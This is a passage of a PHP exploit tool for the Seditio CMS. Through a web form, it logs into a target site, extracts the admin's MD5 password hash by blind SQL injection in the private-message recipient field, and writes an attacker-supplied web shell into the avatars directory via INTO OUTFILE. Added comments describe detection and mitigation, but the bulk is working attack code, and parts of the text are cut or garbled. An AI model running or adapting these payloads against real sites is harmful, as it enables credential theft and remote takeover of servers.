(.*)<\/b> on/", implode(sendd($hostname, $p4.'/plug.php?e=search', 'GET', '', 'PHPSESSID=./[]')), $m)) { return str_replace('\\', '/', substr($m['1'], 0, -17)); } } function get_shell() { global $p4, $razd, $hostname, $pe4enki, $myname, $x, $shell, $fullp; $expl = 'newpmrecipient='.$myname.'\')'.$razd.'into'.$razd.'outfile'.$razd.'\''.$fullp.'\''.$razd.'fields'.$razd.'terminated'.$razd.'by'.$razd.'\'\''.$razd.'optionally'.$razd.'enclosed'.$razd.'by'.$razd.$shell.'/*&newpmtitle;=111d1&newpmtext;=333ads&x;='.$x; sendd($hostname, $p4.'/pm.php?m=send&a;=send&to;=', 'POST', $expl, $pe4enki); } function login($uname, $pass) { global $p4, $hostname; $get_cookie = sendd($hostname, $p4.'/users.php?m=auth&a;=check', 'POST', 'rusername='.$uname.'&rpassword;='.$pass.'&x;=GUEST', ''); foreach ($get_cookie as $value) { if (strpos($value, 'Set-Cookie: PHPSESSID=') !== false) { $temp = explode(";", $value); $pe4enki = strstr($temp[0], 'PHPSESSID'); } if (strpos($value, 'Set-Cookie: SEDITIO=') !== false) { $temp = explode(";", $value); $pe4enki .= '; '.strstr($temp[0], 'SEDITIO'); break; } } return trim($pe4enki); } function secret() { global $p4, $hostname, $pe4enki; if(preg_match("/
<\/div><\/form>/", implode(sendd($hostname, $p4.'/pm.php?m=send&a;=send&to;=', 'GET', '', $pe4enki)), $m)) { return $m['1']; } } //hash 48-57 97-102 function get_pass() { global $p4, $razd, $hostname, $tbl_user, $userid, $pe4enki, $myname, $x, $result; for($n = 0; ++$n <= 32;) { for($i = 47; ++$i <= 102;) { if($i == 58) $i = 97; $expl = 'newpmrecipient='.$myname.'\')'.$razd.'and((select'.$razd.'case'.$razd.'when'.$razd.'ascii(substring((select'.$razd.'user_password'.$razd.'from'.$razd.$tbl_user.$razd.'where'.$razd.'user_id='.$userid.')'.$razd.'from'.$razd.$n.$razd.'for'.$razd.'1))='.$i.$razd.'then'.$razd.'1'.$razd.'else'.$razd.'2'.$razd.'end)=1)/*&newpmtitle;=ru_antichat_by_c411k&newpmtext;=o9e6u_gema_privetkakdela_tygdepropal_izvEni&x;='.$x; if(!preg_match("/At least one recipient was wrong(.*)/", implode(sendd($hostname, $p4.'/pm.php?m=send&a;=send&to;=', 'POST', $expl, $pe4enki)))) { echo chr($i); $result .= chr($i); break; } myflush(500); } } } if (!$_GET) { echo '

 ¬ hostname, for expamle "antichat.ru"  ¬ path to index seditio  ¬ admin id, default 1  ¬ register user login  ¬ register user password  ¬ name user table (or database.user_table) , default sed_users.  ¬ +, %20, /**/

 ¬ full path '; } if (isset($_GET['go_fuck'])) { $hostname = $_POST['hostname']; $p4 = $_POST['path']; $razd = $_POST['razd']; $tbl_user = $_POST['prefix']; $userid = $_POST['userid']; $myname = $_POST['myname']; $mypwd = $_POST['mypwd']; $fullp = $_POST['fullp']; $shell = $_POST['shell']; //$result = array('pass' => '', 'salt' => ''); if (isset($_POST['try_fullp'])) echo '
'.get_fullp().'datas/avatars/out.php';
	
	// get_hash branch: logs in with the operator-supplied account, fetches the
	// send-form value via secret(), then calls get_pass() (defined earlier in
	// this file). get_pass() tests one character of user_password at a time
	// through the newpmrecipient field of pm.php?m=send and echoes each
	// character it confirms.
	//
	// Defender view: get_pass() walks 32 positions x 16 hex-digit candidates,
	// so one run is a burst of up to 512 POSTs to pm.php?m=send from a single
	// logged-in session, each carrying SQL keywords in newpmrecipient. The
	// burst is visible in ordinary access logs; seeing the keywords needs
	// request-body inspection (WAF or application logging).
	//
	// NOTE(review): the flaw itself is in the target's pm.php recipient
	// handling, which is not shown here; presumably the value reaches a query
	// unescaped, and bound parameters there are the fix. After a confirmed
	// run, treat the queried account's hash (MD5, per the label printed
	// below) as disclosed and rotate that credential.
	if (isset($_POST['get_hash']))
	{
		$pe4enki = login($myname, $mypwd); // cookie string built by login() from the PHPSESSID and SEDITIO Set-Cookie headers
		echo '
cookies: '.$pe4enki.'
'; myflush(500); $x = secret(); echo 'o9e6u: '.$x.'
'; myflush(500); echo '
password hash (md5): ';
		get_pass(); // appends to the global $result and echoes as it goes; returns nothing
	}
	
	// get_shell branch: logs in, fetches the send-form value via secret(),
	// hex-encodes the operator-supplied $shell text, then calls get_shell()
	// (defined earlier in this file). get_shell() posts a newpmrecipient value
	// that appends INTO OUTFILE '$fullp' to the query, i.e. it tries to make
	// the database server write a file into the web tree.
	// $x looks like the send form's anti-CSRF token replayed as the x
	// parameter (the pattern in secret() is garbled in this copy; TODO confirm).
	//
	// Defender view: the write depends on three conditions, and removing any
	// one of them stops it: the application's database account holding the
	// FILE privilege, the server's secure_file_priv setting allowing the
	// target directory, and the web server executing PHP from the avatar
	// upload directory. Revoke FILE from the application account, set
	// secure_file_priv, and disable script execution under datas/avatars/.
	// An unexpected .php file in that directory is an indicator worth
	// alerting on.
	if (isset($_POST['get_shell']))
	{
		$pe4enki = login($myname, $mypwd); // cookie string built by login() from the PHPSESSID and SEDITIO Set-Cookie headers
		echo '
cookies: '.$pe4enki.'
'; myflush(500); $x = secret(); echo 'o9e6u: '.$x.'
'; myflush(500); $shell = '0x'.bin2hex(stripslashes(trim($shell))); get_shell(); echo '
check: '.$hostname.'/'.$p4.'/datas/avatars/out.php'; // prints the expected location of the written file
	}
}

?>